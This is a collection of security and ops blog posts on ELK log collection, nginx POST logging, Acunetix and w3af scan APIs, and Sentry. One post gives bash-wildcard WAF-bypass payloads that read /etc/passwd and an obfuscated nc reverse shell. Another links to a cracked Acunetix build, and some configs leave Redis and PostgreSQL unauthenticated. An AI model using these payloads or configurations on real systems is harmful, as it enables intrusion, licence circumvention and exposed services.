Log Collection with RELK

Published: April 3, 2018 // Categories: Dev Notes, Ops, python // No Comments

A while back, doing incident response, I kept getting asked to analyze logs for attack tracing. It occurred to me that if the common log formats were parsed and stored in a unified database, the relevant IPs and URLs could then be tallied and summarized, which makes tracing very convenient. Given the large data volume and the need for easy analysis, ELK came to mind.

So: build an ELK-based log analysis system.
System: CentOS, 4 GB RAM, dual core.

The rough architecture:

1. Setting up ELK

wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-6.2.3.rpm
wget https://artifacts.elastic.co/downloads/kibana/kibana-6.2.3-x86_64.rpm
wget https://artifacts.elastic.co/downloads/logstash/logstash-6.2.3.rpm

rpm -ivh elasticsearch-6.2.3.rpm 
sudo chkconfig --add elasticsearch
/etc/init.d/elasticsearch start

rpm -ivh kibana-6.2.3-x86_64.rpm 
/etc/init.d/kibana start
sudo chkconfig --add kibana

rpm -ivh logstash-6.2.3.rpm
cd /usr/share/logstash
ln -s /etc/logstash ./config

With the whole ELK stack in place, install Redis as the agent-side collector that serves as Logstash's input source.

wget http://download.redis.io/redis-stable.tar.gz
tar zxf redis-stable.tar.gz 
cd redis-stable
make && make install

Edit redis.conf:

bind 0.0.0.0
protected-mode no
daemonize yes
maxclients 1000000

Start Redis:

sudo cp redis.conf /etc/
redis-server /etc/redis.conf

Logstash pipeline config files live in /etc/logstash/conf.d and are written in Logstash's own JSON-like syntax. A pipeline consists of three parts: input, filter, and output.

input: the data entry point; it can receive source data from almost anywhere.
file: read events from a file
syslog: listen on port 514 for syslog messages and parse them into RFC 3164 format
redis: fetch events from a redis-server list
beats: receive events from Filebeat
filter: the transformation layer, handling formatting, type conversion, filtering, and adding or modifying fields. Commonly used filters:
grok: parse and structure arbitrary text with regular expressions. Grok is currently the best way in Logstash to turn unstructured log data into something structured and queryable; it ships with 120 built-in patterns, which cover most needs.
mutate: perform general transformations on event fields; rename, remove, replace, and modify them.
drop: discard an event entirely, e.g. debug events.
clone: duplicate an event, optionally adding or removing fields.
geoip: add geolocation information for an IP address.
output: the final stage of the pipeline, shipping data to its destination; it is compatible with most applications. Commonly used outputs:
elasticsearch: send event data to Elasticsearch for querying, analysis, and charting.
file: write event data to a file on disk.
mongodb: send event data to MongoDB, a high-performance NoSQL store, for long-term storage, querying, analysis, and sharding.
redis: send data to a redis-server, commonly used as an intermediate buffer.
graphite: send event data to Graphite. http://graphite.wikidot.com/
statsd: send event data to statsd.

Now write the Logstash pipeline config. It accepts everything across the board; thanks to Mosuan for the guidance.

input {
    redis {
        host => '127.0.0.1'
        port => 6379
        password => 'password'
        data_type => 'list'
        key => 'logstash:redis'
    }
}
output {
    elasticsearch { hosts => ["localhost"] }
    stdout { codec => rubydebug }
}
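
With this pipeline, anything that can push JSON strings onto that Redis list becomes a log source. A minimal producer sketch, assuming the redis-py package; the host, password, and the sample event are placeholders:

# -*- coding: utf-8 -*-
# Minimal sketch: push one log event onto the Redis list Logstash reads.
# Host/password and the sample event are placeholders.
import json
import redis

r = redis.StrictRedis(host='127.0.0.1', port=6379, db=0, password='password')

event = {
    'message': '1.2.3.4 - - [03/Apr/2018:10:00:00 +0800] "GET /index.php HTTP/1.1" 200 612',
    'type': 'nginx-access',
}

# The redis input with data_type => 'list' pops from the same key,
# so a plain RPUSH is all a producer needs.
r.rpush('logstash:redis', json.dumps(event))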

Logpara

A rough demo that parses common web server logs.

Python 2.7

Goals

  • Parse each requested URL and flag common attack patterns
  • Resolve each visiting IP in depth, including latitude/longitude and physical location
  • Parse each visitor User-Agent in depth: device, browser family, and whether it is a crawler
  • Parse all logs into the database for RELK processing

TO DO

  • Process and visualize the logs stored in Elasticsearch

Usage

  • Before use, edit common/units.py:

    redis_host = '192.168.87.222'
    redis_port = 6379
    redis_pass = 'cft67ygv'
    redis_db = 0
    redis_key = 'logstash:redis'
    
  • Run it:
Usage: main.py --type IIS|Apache|Tomcat|Nginx --file file|directory

log parser

Options:
  -h, --help   show this help message and exit
  --type=TYPE  chose which log type
  --file=FILE  chose file or directory

Script: https://github.com/0xa-saline/Logpara
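
For a sense of what the parsing step involves, here is a rough stand-in (not Logpara's actual code) that splits one nginx combined-format line into fields with a regular expression:

# -*- coding: utf-8 -*-
# Rough illustration of parsing an nginx combined-format access log line.
# A simplified stand-in, not Logpara's implementation.
import re

LINE = ('1.2.3.4 - - [03/Apr/2018:10:00:00 +0800] "GET /index.php?id=1 HTTP/1.1" '
        '200 612 "-" "Mozilla/5.0"')

PATTERN = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

m = PATTERN.match(LINE)
if m:
    # each field can now be enriched (GeoIP, UA parsing) and pushed to Redis
    print(m.groupdict())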

The imported results look something like this:


Viewing a single entry:

With nginx you can additionally capture POST data, which helps a great deal in forensics, tracing, and log analysis.

Bash Wildcards in Command Execution

Published: February 25, 2018 // Categories: Ops, linux // No Comments

This came up while discussing a bypass with a friend. Digging around later, I found that researchers abroad had already published similar material. So consider this a write-up for the record, courtesy of the porter.

First, some background on bash wildcards.

? matches any single character. That means the usual cat /etc/passwd can be rewritten with ? standing in for literal characters.

Start with the familiar ls:

root@bee-box:~# which ls
/bin/ls
root@bee-box:~# echo /???/?s
/bin/ls /bin/ps /sys/fs
root@bee-box:~#

So ls can be replaced with /???/?s. Likewise, cat can be reached with /???/??t or /???/c?t. When bypassing a WAF these should be directly usable.

root@bee-box:~# echo /???/c?t
/bin/cat
root@bee-box:~# echo /???/??t
/bin/cat /dev/net /etc/apt /etc/opt /etc/rmt /var/opt

Now try the common cat /etc/passwd,
replacing it with /???/??t /???/??ss??

The result is not much different from running it directly.

In practice, though, the WAF we tested rejected anything with more than four ?s.

For a straight nc reverse shell, it becomes:

/???/?c -e /???/b??h 2130706433 7088
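
The 2130706433 above is simply 127.0.0.1 written as a single decimal integer, another way to avoid literal dots in a payload. A quick sketch of the conversion:

# Convert a dotted-quad IP to the single decimal form used in the nc
# example above: 127.0.0.1 -> 2130706433
def ip_to_decimal(ip):
    a, b, c, d = [int(x) for x in ip.split('.')]
    return (a << 24) | (b << 16) | (c << 8) | d

print(ip_to_decimal('127.0.0.1'))  # 2130706433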

A few extra tips:
1. Bash concatenation works not only on paths but on commands too; on Linux, single quotes can be used to split characters inside a word.
2. \ is merely an escape character, but it can likewise stand in for the quote trick.

$ /bin/cat /etc/passwd
$ /bin/cat /e'tc'/pa'ss'wd
$ /bin/c'at' /e'tc'/pa'ss'wd
$ /b'i'n/c'a't /e't'c/p'a's's'w'd'
$ c\a\t /et\c/passwd

Logging POST Data with nginx

Published: December 6, 2017 // Categories: Work Log, Ops, Dev Notes, linux // No Comments

I started out with Apache, but found that logging POST data there requires extra modules or hooking Apache itself. Then I discovered nginx can log POST data natively.

log_format  main  '$remote_addr - $remote_user [$time_local] "$request" '
             '$status $body_bytes_sent "$http_referer" '
             '"$http_user_agent" $http_x_forwarded_for';
The $request_body variable is provided by nginx itself and is what records the POST request body.

The final format that captures POST data:

log_format  access  '$remote_addr  $remote_user  [$time_local]  $request '
             '$status  $body_bytes_sent  $http_referer   '
             '$http_user_agent $http_x_forwarded_for [$request_body]';

And another variant that also records the cookie and the host:

log_format  access  '$remote_addr  [$time_local]  $host $request $status $http_referer $http_user_agent $http_cookie [$request_body]';  

Consider whether $body_bytes_sent could be dropped.
Enable the log:

access_log  /data/logs/access.log access;

Restart nginx and test:

curl -d cmd=`id|base64` http://0cx.cc/\?cmd\=$(whoami) --refer $(id|base64) --user-agent $(id|base64)

The captured log entry:

References:
Nginx: using lua-nginx-module to capture the request and response of POST requests
http://www.jianshu.com/p/78853c58a225
Fixing nginx hex-escaping Chinese characters when logging POST data
http://www.jianshu.com/p/8f8c2b5ca2d1

Dealing with WVS's Constant Activation Prompts

Published: September 15, 2017 // Categories: Work Log, Dev Notes, Ops // 3 Comments

Today a friend mentioned that WVS keeps prompting for activation and won't scan until you deal with it. So I thought about how to solve this automatically, or at least quickly. As far as I know there are two options: actually activate it each time, or block its communication with the licensing server so it never asks again.

1. Auto-activation
Blocking updates reduces how often the prompt appears, but it still shows up. So I put together an auto-activation script and registered it as a scheduled task that runs once a day... ^_^

WScript.Echo "wvs auto Activation by Saline"
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "Activation.exe"
WScript.Sleep 2500
WshShell.SendKeys "{ENTER}"
WScript.Sleep 2500
WshShell.SendKeys "{ENTER}"
WScript.Sleep 2500
WshShell.SendKeys "{ENTER}"
WScript.Sleep 2500
WshShell.Run "taskkill /im chrome.exe /f"
WScript.Sleep 2500
WshShell.SendKeys "{ENTER}"
WScript.Sleep 100
WScript.Echo "Activation finished"
WshShell.Run "proto.exe awvs://launch/"
WScript.Sleep 2500
WshShell.Run "taskkill /im chrome.exe /f"
WScript.Sleep 100
WScript.Echo "wvs restart finish"

Swap chrome.exe for whatever browser you actually use. Save the script as xxx.vbs in the WVS install directory, then create a bat:

cd C:\Program Files (x86)\Acunetix 11\11.0.170951158
cscript reactive.vbs
exit

Then add the bat to the task scheduler:

schtasks  /create  /tn  wvs_active /tr  c:\wvs_task.bat  /sc  DAILY /st  00:30:00  


I stayed up until 00:30 just to watch it fire; no idea why I picked that time.

I wanted to record a GIF but couldn't manage it; there's a video instead:
http://www.iqiyi.com/w_19rv72o4ch.html

2. Add the licensing host to the hosts file
This was suggested by another researcher; I haven't tested it yet.

More additions and suggestions are welcome.

Driving Scans via the Acunetix 11 API

Published: May 19, 2017 // Categories: Work Log, Dev Notes, Ops, linux, windows // 12 Comments

Documentation for the API is scarce; after a long search online I only turned up two references.

1. Get an API key
First, generate an API key
via Administrator--Profile in the top-right corner.

2. Create a scan target

Before you can run a scan you need to create a scan target for the site you want scanned, via the (POST) targets endpoint. Using cURL:

curl -k --request POST --url https://127.0.0.1:3443/api/v1/targets --header "X-Auth: apikey" --header "content-type: application/json" --data "{\"address\":\"http://testphp.vulnweb.com/\",\"description\":\"testphp.vulnweb.com\",\"criticality\":\"10\"}"

Where:

- https://127.0.0.1:3443 is the Acunetix 11 host and port (the machine where Acunetix 11 is installed)
- API-KEY is the Acunetix 11 API key; once installed, you can generate one under Administration in the top-right of the UI
- http://testphp.vulnweb.com is the target URL to add; be sure to include http or https
- testphp.vulnweb.com is a description of the target (optional)
- 10 is the target criticality (Critical [30], High [20], Normal [10], Low [0])

On success the command returns 201 together with other data, including target_id (the trailing segment of the Location value in the response).


C:\Users\Administrator\Desktop
> curl -k --request POST --url https://127.0.0.1:3443/api/v1/targets --header "X-Auth: API_KEY" --header "content-type: application/json" --data "{\"address\":\"http://testphp.vulnweb.com/\",\"description\":\"testphp.vulnweb.com\",\"criticality\":\"10\"}"
{
 "target_id": "07674c74-728e-4e99-aa9c-b5ac238975b9",
 "criticality": 10,
 "address": "http://testphp.vulnweb.com/",
 "description": "testphp.vulnweb.com"
}

3. Run a scan against the created target

curl -k -i --request POST --url https://127.0.0.1:3443/api/v1/scans --header "X-Auth: API_KEY" --header "content-type: application/json" --data "{\"target_id\":\"07674c74-728e-4e99-aa9c-b5ac238975b9\",\"profile_id\":\"11111111-1111-1111-1111-111111111111\",\"schedule\":{\"disable\":false,\"start_date\":null,\"time_sensitive\":false}}"

Where:

- https://127.0.0.1:3443 is the Acunetix 11 host and port
- API-KEY is the API key generated in step 1
- TARGET-ID is the target_id value from the earlier JSON response
- 11111111-1111-1111-1111-111111111111 is the scan profile ID; use the (GET) scanning_profiles endpoint to list the profiles and their IDs

To list the scanning profiles (and their profile_id values):

> curl -k https://127.0.0.1:3443/api/v1/scanning_profiles --header "X-Auth: API_KEY"
{
 "scanning_profiles": [
  {
   "custom": false,
   "checks": [],
   "name": "Full Scan",
   "sort_order": 1,
   "profile_id": "11111111-1111-1111-1111-111111111111"
  },
  {
   "custom": false,
   "checks": [],
   "name": "High Risk Vulnerabilities",
   "sort_order": 2,
   "profile_id": "11111111-1111-1111-1111-111111111112"
  },
  {
   "custom": false,
   "checks": [],
   "name": "Cross-site Scripting Vulnerabilities",
   "sort_order": 3,
   "profile_id": "11111111-1111-1111-1111-111111111116"
  },
  {
   "custom": false,
   "checks": [],
   "name": "SQL Injection Vulnerabilities",
   "sort_order": 4,
   "profile_id": "11111111-1111-1111-1111-111111111113"
  },
  {
   "custom": false,
   "checks": [],
   "name": "Weak Passwords",
   "sort_order": 5,
   "profile_id": "11111111-1111-1111-1111-111111111115"
  },
  {
   "custom": false,
   "checks": [],
   "name": "Crawl Only",
   "sort_order": 6,
   "profile_id": "11111111-1111-1111-1111-111111111117"
  }
 ]
}

Start a scan:

> curl -k -i --request POST --url https://127.0.0.1:3443/api/v1/scans --header "X-Auth: API_KEY" --header "content-type: application/json" --data "{\"target_id\":\"07674c74-728e-4e99-aa9c-b5ac238975b9\",\"profile_id\":\"11111111-1111-1111-1111-111111111111\",\"schedule\":{\"disable\":false,\"start_date\":null,\"time_sensitive\":false}}"
HTTP/1.1 201 Created
Pragma: no-cache
Content-type: application/json; charset=utf8
Cache-Control: no-cache, must-revalidate
Expires: -1
Location: /api/v1/scans/a6e36dd0-9976-46a7-9740-29f897f911d6
Date: Fri, 19 May 2017 03:40:12 GMT
Transfer-Encoding: chunked

{
 "target_id": "07674c74-728e-4e99-aa9c-b5ac238975b9",
 "ui_session_id": null,
 "schedule": {
  "disable": false,
  "start_date": null,
  "time_sensitive": false
 },
 "profile_id": "11111111-1111-1111-1111-111111111111"
}

4. Check scan status

First list the scans to get a scan_id:

curl -k --url https://127.0.0.1:3443/api/v1/scans --header "X-Auth:API_KEY" --header "content-type: application/json"

Then fetch the details for a specific scan_id:

 curl -k --url https://127.0.0.1:3443/api/v1/scans/56d847bc-344b-4513-a960-69e7d1988a46 --header "X-Auth:API-KEY" --header "content-type: application/json"

5. Abort a scan

The endpoint pattern is apiurl + /scans/ + scan_id + /abort:

 curl -k --url https://127.0.0.1:3443/api/v1/scans/56d847bc-344b-4513-a960-69e7d1988a46/abort --header "X-Auth:API-KEY" --header "content-type: application/json"

6. Reports

List the report templates:

curl -k --url https://127.0.0.1:3443/api/v1/report_templates --header "X-Auth:API-KEY" --header "content-type: application/json"

Generate a report:

curl -k -i --request POST --url https://127.0.0.1:3443/api/v1/reports --header "X-Auth: API-KEY" --header "content-type: application/json" --data "{\"template_id\":\"11111111-1111-1111-1111-111111111111\",\"source\":{\"list_type\":\"scans\", \"id_list\":[\"SCAN-ID\"]}}"

Where:
- https://127.0.0.1:3443 is the Acunetix 11 host and port
- API-KEY is the API key generated in step 1
- SCAN-ID is the scan_id from the earlier JSON response

A 201 HTTP response indicates the request succeeded and includes a Location header carrying the report id (e.g. Location: /api/v1/reports/54f402f6-7a60-4934-952f-45bfe6c4abf4). Once the report is generated, that id can be used to download it from https://127.0.0.1:3443/reports/download/54f402f6-7a60-4934-952f-45bfe6c4abf4.pdf. Recent versions also produce an HTML report, available at https://127.0.0.1:3443/reports/download/54f402f6-7a60-4934-952f-45bfe6c4abf4.html.
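
Putting steps 4 through 6 together, here is a small sketch (assuming the requests package; the API key and scan id are placeholders) that requests a report and derives the download URL from the Location header as described above:

# -*- coding: utf-8 -*-
# Sketch: request a report for a finished scan, then build the download URL
# from the Location header. API key and scan id are placeholders.
import json
import requests

base = 'https://127.0.0.1:3443'
headers = {'X-Auth': 'API_KEY', 'content-type': 'application/json'}
data = {'template_id': '11111111-1111-1111-1111-111111111111',
        'source': {'list_type': 'scans', 'id_list': ['SCAN-ID']}}

resp = requests.post(base + '/api/v1/reports', data=json.dumps(data),
                     headers=headers, verify=False)
report_id = resp.headers['Location'].split('/')[-1]
print(base + '/reports/download/' + report_id + '.pdf')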

References

1.https://github.com/jenkinsci/acunetix-plugin/blob/master/src/main/java/com/acunetix/Engine.java
2.http://blog.csdn.net/qq_31497435/article/details/64441474

Some readers asked where to download this build.

It's Hmily's release from 52pojie; enough said.
Original post: http://www.52pojie.cn/thread-609275-1-1.html
Baidu mirror: http://pan.baidu.com/s/1c1JoyBm password: hyue
[The previous share was reported and taken down, so this time the original file and the patch are in an archive with password: www.52pojie.cn]

How to enable remote access:
choose "allow remote access" during installation.

#!/usr/bin/python
# -*- coding: utf-8 -*-

import json
import requests
import requests.packages.urllib3
'''
import requests.packages.urllib3.util.ssl_
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS = 'ALL'

or 

pip install requests[security]
'''
requests.packages.urllib3.disable_warnings()

tarurl = "https://127.0.0.1:3443/"
apikey="yourapikey"
headers = {"X-Auth":apikey,"content-type": "application/json"}

def addtask(url=''):
    # create a scan target
    data = {"address":url,"description":url,"criticality":"10"}
    try:
        response = requests.post(tarurl+"/api/v1/targets",data=json.dumps(data),headers=headers,timeout=30,verify=False)
        result = json.loads(response.content)
        return result['target_id']
    except Exception as e:
        print(str(e))
        return

def startscan(url):
    # list existing targets first, to avoid duplicates
    # create the target and get its target_id
    # then start the scan
    targets = getscan()
    if url in targets:
        return "repeat"
    else:
        target_id = addtask(url)
        data = {"target_id":target_id,"profile_id":"11111111-1111-1111-1111-111111111111","schedule": {"disable": False,"start_date":None,"time_sensitive": False}}
        try:
            response = requests.post(tarurl+"/api/v1/scans",data=json.dumps(data),headers=headers,timeout=30,verify=False)
            result = json.loads(response.content)
            return result['target_id']
        except Exception as e:
            print(str(e))
            return

def getstatus(scan_id):
    # get the scan status for scan_id
    try:
        response = requests.get(tarurl+"/api/v1/scans/"+str(scan_id),headers=headers,timeout=30,verify=False)
        result = json.loads(response.content)
        status = result['current_session']['status']
        # "completed" means the scan is done and a report can be generated
        if status == "completed":
            return getreports(scan_id)
        else:
            return result['current_session']['status']
    except Exception as e:
        print(str(e))
        return

def getreports(scan_id):
    # generate the report for scan_id and return its download URL
    data = {"template_id":"11111111-1111-1111-1111-111111111111","source":{"list_type":"scans","id_list":[scan_id]}}
    try:
        response = requests.post(tarurl+"/api/v1/reports",data=json.dumps(data),headers=headers,timeout=30,verify=False)
        result = response.headers
        report = result['Location'].replace('/api/v1/reports/','/reports/download/')
        return tarurl.rstrip('/')+report
    except Exception as e:
        print(str(e))
        return

def getscan():
    # fetch the status of all scans
    targets = []
    try:
        response = requests.get(tarurl+"/api/v1/scans",headers=headers,timeout=30,verify=False)
        results = json.loads(response.content)
        for result in results['scans']:
            targets.append(result['target']['address'])
            print result['scan_id'],result['target']['address'],getstatus(result['scan_id'])#,result['target_id']
        return list(set(targets))
    except Exception as e:
        raise e

if __name__ == '__main__':
    print startscan('http://testhtml5.vulnweb.com/')

Actual test run:

P.S. With a big shot's help I grabbed the PostgreSQL connection info and half-guessed my way to the password [as it turns out, the config file allows passwordless local connections, so none of that was needed. Awkward.]

Some readers asked how to get at the detailed scan data. After thinking it over, one way is to enable remote connections to PostgreSQL.
1. Locate postgresql.conf:

C:\Program Files (x86)\Acunetix 11
> find \ -name "postgresql.conf"
/ProgramData/Acunetix 11/db/postgresql.conf

It lives under C:\ProgramData\Acunetix 11\db.

Open it and change listen_addresses from localhost to *:

#listen_addresses = 'localhost'
listen_addresses = '*'

Then open pg_hba.conf in the same directory and add a line below # IPv4 local connections::

# IPv4 local connections:
host    all             all             127.0.0.1/32            trust
host    all             wvs             192.168.0.0/24          trust

Here 192.168.0.0/24 means any IP in the 192.168.0.x range may connect without a password. Save the file when done.

Restart the Acunetix Database service.
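
Once remote access is open, any PostgreSQL client can attach. A minimal sketch with psycopg2; the database name, port, and query below are assumptions for illustration, so check them against the actual install:

# -*- coding: utf-8 -*-
# Sketch: connect to the now remotely accessible PostgreSQL instance.
# dbname, port, and the query are assumptions; verify against the install.
import psycopg2

conn = psycopg2.connect(host='192.168.0.10', port=5432,
                        user='wvs', dbname='wvs')  # trust auth: no password
cur = conn.cursor()
cur.execute('SELECT version()')
print(cur.fetchone()[0])
conn.close()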

Setting up Sentry with Docker

Published: April 13, 2017 // Categories: Ops, Dev Notes, linux, windows, python, Misc // 2 Comments

I recently read Dong Weiming's 《python web实战开发》 and noticed he recommends a gem called Sentry. Not long before, a friend and I had been discussing how to record exceptions from try/except blocks, and this fits the bill exactly.

**Overview**

Sentry’s real-time error tracking gives you insight into production deployments and information to reproduce and fix crashes. --- from the official site
Sentry is a real-time event logging and aggregation platform focused on error monitoring: it captures everything needed to debug after the fact. Built on Django, it helps developers dig exceptions out of log files scattered across multiple servers. Sentry is written in Python, open source, performant, and easy to extend; well-known users include Disqus, Path, Mozilla, and Pinterest. It splits into a client and a server: the client is embedded in your application and reports exceptions to the server, which stores them in a database and provides a web UI for browsing.

**Installation**
The official docs (https://docs.sentry.io/) describe two ways to install the server: with Python, which I found rather cumbersome, and with Docker, which is what the project recommends and what I went with.

This route requires **docker** and **docker-compose** to be installed first.

0x01 Install docker
0x02 Install docker-compose
0x03 Fetch sentry
0x04 Set up sentry

I already have docker and docker-compose locally, so I'll start from step 3.

git clone https://github.com/getsentry/onpremise.git

Once it's cloned, just follow its README.md; the whole process is fairly smooth.

**Step 1: create the database and Sentry data directories**

mkdir  -p data/{sentry,postgres}

**Step 2: generate a secret key and add it to the docker-compose file**

sudo docker-compose run --rm web config generate-secret-key

This step takes a while. Along the way it prompts you to create a superuser: the username is an email address, which will later receive Sentry notifications, and the password can be anything you will remember.

At the end it prints a string of gibberish to the terminal (something like z#4zkbxk1@8r*t=9z^@+q1=66zbida&dliunh1@p–u#zv63^g).
That is the secret key. Copy it into docker-compose.yml and save: uncomment SENTRY_SECRET_KEY and paste the string in, like so:

**Step 3: rebuild the database and create the Sentry superuser**

sudo docker-compose run --rm web upgrade

Create the user; a fresh Sentry install needs a superuser.

**Step 4: start all the services**

sudo docker-compose up -d


At this point the Sentry setup is complete!

The result in practice:

from raven import Client

client = Client('http://f4e4bfb6d653491281340963951dde74:10d7b52849684a32850b8d9fde0168dd@127.0.0.1:9000/2')

# excerpt: a query method from a database wrapper class (Python 2)
    def find_result(self, sql, arg=''):
        try:
            with self.connection.cursor() as cursor:
                if len(arg) > 0:
                    cursor.execute(sql, arg)
                else:
                    cursor.execute(sql)
                result = cursor.fetchone()
                self.connection.commit()
                return result
        except Exception, e:
            client.captureException()
            print sql, str(e)

print sql,str(e)

prints the error:

client.captureException()

The error as recorded in Sentry:

About w3af_api

Published: November 23, 2016 // Categories: Dev Notes, Ops, Work Log, linux, Code Study, python, Misc // No Comments

Today I came across a SaaS product, chatted with the author, and learned it's built on w3af_api, with the other scan types added by him. It seemed impressive, so I went over to take another look at w3af. The relevant documentation is here.

w3af counts as an old-school tool at this point. I rarely use it myself; the results never felt as good as hoped. Its crawler module, for example, hasn't been updated in ages, so it fails to accurately capture many of today's dynamic pages. Compare:

- http://testphp.acunetix.com/
- http://testphp.acunetix.com/AJAX/
- http://testphp.acunetix.com/AJAX/index.php
- http://testphp.acunetix.com/AJAX/styles.css
- http://testphp.acunetix.com/Flash/
- http://testphp.acunetix.com/Flash/add.fla
- http://testphp.acunetix.com/Flash/add.swf
- http://testphp.acunetix.com/Mod_Rewrite_Shop/
- http://testphp.acunetix.com/Mod_Rewrite_Shop/images/1.jpg
- http://testphp.acunetix.com/Mod_Rewrite_Shop/images/2.jpg
- http://testphp.acunetix.com/Mod_Rewrite_Shop/images/3.jpg
- http://testphp.acunetix.com/artists.php
- http://testphp.acunetix.com/cart.php
- http://testphp.acunetix.com/categories.php
- http://testphp.acunetix.com/disclaimer.php
- http://testphp.acunetix.com/guestbook.php
- http://testphp.acunetix.com/hpp/
- http://testphp.acunetix.com/hpp/params.php
- http://testphp.acunetix.com/images/logo.gif
- http://testphp.acunetix.com/images/remark.gif
- http://testphp.acunetix.com/index.php
- http://testphp.acunetix.com/listproducts.php
- http://testphp.acunetix.com/login.php
- http://testphp.acunetix.com/product.php
- http://testphp.acunetix.com/redir.php
- http://testphp.acunetix.com/search.php
- http://testphp.acunetix.com/secured/
- http://testphp.acunetix.com/secured/newuser.php
- http://testphp.acunetix.com/secured/style.css
- http://testphp.acunetix.com/showimage.php
- http://testphp.acunetix.com/signup.php
- http://testphp.acunetix.com/style.css
- http://testphp.acunetix.com/userinfo.php

That list is what w3af crawled. The crawler I put together a few days ago found the following (it fuzzes directories before crawling, so it basically meets the need):

But that's beside the point; the subject here is w3af_api. Its documentation is over here; a quick rundown follows.

1. Startup. There are two main ways: run it directly,

$ ./w3af_api
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)

or use docker:

$ cd extras/docker/scripts/
$ ./w3af_api_docker
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)

2. Authentication. You can set your own password; the default hashing scheme is sha512sum.

Generate the password hash:

$ echo -n "secret" | sha512sum
bd2b1aaf7ef4f09be9f52ce2d8d599674d81aa9d6a4421696dc4d93dd0619d682ce56b4d64a9ef097761ced99e0f67265b5f76085e5b0ee7ca4696b2ad6fe2b2  -

$ ./w3af_api -p "bd2b1aaf7ef4f09be9f52ce2d8d599674d81aa9d6a4421696dc4d93dd0619d682ce56b4d64a9ef097761ced99e0f67265b5f76085e5b0ee7ca4696b2ad6fe2b2"
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
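
If it's more convenient, the same hash can be produced with Python's standard library; a quick equivalent of the shell pipeline above:

# Equivalent of `echo -n "secret" | sha512sum` (Python 2; use b'secret' on 3)
import hashlib

print(hashlib.sha512('secret').hexdigest())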

You can also put the credentials and other settings in a YAML config file and start from that.

3. API usage

Start a new scan: [POST] /scans/
Check scan status: GET /scans/0/status
Fetch discovered vulnerabilities: GET /scans/0/kb/
Delete a scan: DELETE /scans/0/
List all scans: GET /scans/
Pause a scan: GET /scans/0/pause
Stop a scan: GET /scans/0/stop
View the scan log: GET /scans/0/log

A real example, kicking off a scan:

import requests
import json

data = {'scan_profile': file('../core/w3af/profiles/full_audit.pw3af').read(),
        'target_urls': ['http://testphp.acunetix.com']}

response = requests.post('http://127.0.0.1:5000/scans/',
                         data=json.dumps(data),
                         headers={'content-type': 'application/json'})
                         
print response.text
scan_profile: the full contents of a w3af scan profile (read from the .pw3af file)
target_urls: the list of URLs for w3af to start crawling from
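
Once the scan is created, checking on it is just a GET against the status endpoint from the list above; a minimal sketch:

# Poll the status of scan 0 (w3af_api numbers scans incrementally)
import requests

status = requests.get('http://127.0.0.1:5000/scans/0/status').json()
print(status)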

Checking the scan status:


Viewing the discovered vulnerabilities:

Details of one specific vulnerability:

{
  "attributes": {
    "db": "MySQL database",
    "error": "mysql_"
  },
  "cwe_ids": [
    "89"
  ],
  "cwe_urls": [
    "https://cwe.mitre.org/data/definitions/89.html"
  ],
  "desc": "SQL injection in a MySQL database was found at: \"http://testphp.acunetix.com/userinfo.php\", using HTTP method POST. The sent post-data was: \"uname=a%27b%22c%27d%22&pass=FrAmE30.\" which modifies the \"uname\" parameter.",
  "fix_effort": 50,
  "fix_guidance": "The only proven method to prevent against SQL injection attacks while still maintaining full application functionality is to use parameterized queries (also known as prepared statements). When utilising this method of querying the database, any value supplied by the client will be handled as a string value rather than part of the SQL query.\n\nAdditionally, when utilising parameterized queries, the database engine will automatically check to make sure the string being used matches that of the column. For example, the database engine will check that the user supplied input is an integer if the database column is configured to contain integers.",
  "highlight": [
    "mysql_"
  ],
  "href": "/scans/0/kb/29",
  "id": 29,
  "long_description": "Due to the requirement for dynamic content of today's web applications, many rely on a database backend to store data that will be called upon and processed by the web application (or other programs). Web applications retrieve data from the database by using Structured Query Language (SQL) queries.\n\nTo meet demands of many developers, database servers (such as MSSQL, MySQL, Oracle etc.) have additional built-in functionality that can allow extensive control of the database and interaction with the host operating system itself. An SQL injection occurs when a value originating from the client's request is used within a SQL query without prior sanitisation. This could allow cyber-criminals to execute arbitrary SQL code and steal data or use the additional functionality of the database server to take control of more server components.\n\nThe successful exploitation of a SQL injection can be devastating to an organisation and is one of the most commonly exploited web application vulnerabilities.\n\nThis injection was detected as the tool was able to cause the server to respond to the request with a database related error.",
  "name": "SQL injection",
  "owasp_top_10_references": [
    {
      "link": "https://www.owasp.org/index.php/Top_10_2013-A1",
      "owasp_version": "2013",
      "risk_id": 1
    }
  ],
  "plugin_name": "sqli",
  "references": [
    {
      "title": "SecuriTeam",
      "url": "http://www.securiteam.com/securityreviews/5DP0N1P76E.html"
    },
    {
      "title": "Wikipedia",
      "url": "http://en.wikipedia.org/wiki/SQL_injection"
    },
    {
      "title": "OWASP",
      "url": "https://www.owasp.org/index.php/SQL_Injection"
    },
    {
      "title": "WASC",
      "url": "http://projects.webappsec.org/w/page/13246963/SQL%20Injection"
    },
    {
      "title": "W3 Schools",
      "url": "http://www.w3schools.com/sql/sql_injection.asp"
    },
    {
      "title": "UnixWiz",
      "url": "http://unixwiz.net/techtips/sql-injection.html"
    }
  ],
  "response_ids": [
    1494
  ],
  "severity": "High",
  "tags": [
    "web",
    "sql",
    "injection",
    "database",
    "error"
  ],
  "traffic_hrefs": [
    "/scans/0/traffic/1494"
  ],
  "uniq_id": "82f91e8c-759b-43b9-82cb-59ff9a38a836",
  "url": "http://testphp.acunetix.com/userinfo.php",
  "var": "uname",
  "vulndb_id": 45,
  "wasc_ids": [],
  "wasc_urls": []
}

That's about everything needed: you can start, pause, stop, and delete scans, and pull the details and remediation guidance for any individual finding. Since everything is exposed over the API, a distributed setup is feasible:

import pika
import requests
import json
import sys
import time
import sqlalchemy as db
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
import os

# database stuffs
Base = declarative_base()

# scan
class Scan(Base):
    __tablename__ = 'scans'
    id = db.Column(db.Integer, primary_key = True)
    relative_id = db.Column(db.Integer)
    description = db.Column(db.Text)
    target_url = db.Column(db.String(128))
    start_time = db.Column(db.Time)
    scan_time = db.Column(db.Time, nullable=True)
